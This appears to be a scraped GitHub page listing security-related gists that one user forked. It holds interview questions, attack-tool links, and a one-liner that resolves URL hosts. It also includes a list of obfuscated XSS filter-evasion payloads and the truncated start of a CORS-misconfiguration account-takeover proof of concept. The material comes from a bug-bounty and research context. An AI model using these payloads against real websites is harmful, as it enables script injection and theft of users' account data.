roycewilliams / tychotithonus GitHub starred

Last updated: 2020-09-20

hariyopmail / secret_book.md

Created September 13, 2020 12:07 — forked from dwallraff/secret_book.md

Secret Book of Knowledge - from https://github.com/trimstray/the-book-of-secret-knowledge credit: @trimstray

"Knowledge is powerful, be careful how you use it!"

hariyopmail / Bug Bounty methodology

Created September 13, 2020 12:02 — forked from cyberheartmi9/Bug Bounty methodology

hariyopmail / tool.sh

Created September 13, 2020 11:59 — forked from dat1063/tool.sh

hariyopmail / Security Engineer - Interview Questions

Created September 13, 2020 11:58 — forked from namishelex01/Security Engineer - Interview Questions.md

	1. What is information security and how is it achieved?
	2. What are the core principles of information security?
	3. What is non-repudiation (as it applies to IT security)?
	4. What is the relationship between information security and data availability?
	5. What is a security policy and why do we need one?
	6. What is the difference between logical and physical security? Can you give an example of both?
	7. What’s an acceptable level of risk?
	8. What are the most common types of attacks that threaten enterprise data security?
	9. What is the difference between a threat and a vulnerability?
	10. Can you give me an example of common security vulnerabilities?

hariyopmail / XSs payloads

Created September 13, 2020 11:58 — forked from shoebpate1/XSs payloads

XSS PAYLOADS by @OFJAAAH

	XSS PAYLOADS - @OFJAAAH


	: \');confirm(1);//
	<x/onmouSeenter=window[`\x61\x6c\x65\x72\x74`]`1337`
	<script>prompt(1)</script>
	<script>confirm(1)</script>
	<script>var fn=window[490837..toString(1<<5)]; fn(atob('YWxlcnQoMSk='));</script>
	<script>var fn=window[String.fromCharCode(101,118,97,108)]; fn(atob('YWxlcnQoMSk='));</script>
	<script>var fn=window[atob('ZXZhbA==')];fn(atob('YWxlcnQoMSk=')); </script>

hariyopmail / github-regexp.csv

Created June 30, 2020 07:53 — forked from steren/github-regexp.csv

All regular expressions on GitHub, extracted with https://gist.github.com/steren/4e8784ba782c624be48f97a4ea808f28

We can't make this file beautiful and searchable because it's too large.

hariyopmail / A工具.yaml

Created June 14, 2020 22:08 — forked from evilH2O2/A工具.yaml

Git-Stars

	- PadBuster:
	- Padding Oracle attacks 自动化脚本
	- https://github.com/AonCyberLabs/PadBuster
	- perl

	- bettercap:
	- 一个非常强大、灵活可移植的中间人攻击框架，它具有跨平台、轻量级以及模块化等优点，在渗透测试过程中能够非常好的进行中间人测试
	- https://github.com/bettercap/bettercap
	- go

hariyopmail / gist:882be6844ebb4ecfd0faece53e3c960e

Created June 14, 2020 22:00 — forked from k3mlol/gist:3752b88da1d6abc06f8c3265998315af

CORS misconfig | Account Takeover from https://hackerone.com/reports/426147

	<html>
	<body>
	<button type='button' onclick='cors()'>CORS</button>
	<p id='demo'></p>
	<script>
	function cors() {
	var xhttp = new XMLHttpRequest();
	xhttp.onreadystatechange = function() {
	if (this.readyState == 4 && this.status == 200) {
	var a = this.responseText; // Sensitive data from niche.co about user account

hariyopmail / ohost.sh

Created June 14, 2020 20:37 — forked from gwen001/ohost.sh

onliner to resolve the host of a given url

	host `echo https://pass:user@abracadabra-mms.starbucks.com:2996/utils/\|sed "s/.*:\/\///"\|cut -d '/' -f 1\|cut -d '@' -f 2\|cut -d':' -f 1`

	function ohost {
	host `echo $1\|sed "s/.*:\/\///"\|cut -d '/' -f 1\|cut -d '@' -f 2\|cut -d':' -f 1`
	}

	function ohosts {
	while read u; do host `echo $u\|sed "s/.*:\/\///"\|cut -d '/' -f 1\|cut -d '@' -f 2\|cut -d':' -f 1`; done < $1
	}

	host `echo https://pass:user@abracadabra-mms.starbucks.com:2996/utils/\|sed "s/.*:\/\///"\|cut -d '/' -f 1\|cut -d '@' -f 2\|cut -d':' -f 1`

	function ohost {
	host `echo $1\|sed "s/.*:\/\///"\|cut -d '/' -f 1\|cut -d '@' -f 2\|cut -d':' -f 1`
	}

	function ohosts {
	while read u; do host `echo $u\|sed "s/.*:\/\///"\|cut -d '/' -f 1\|cut -d '@' -f 2\|cut -d':' -f 1`; done < $1
	}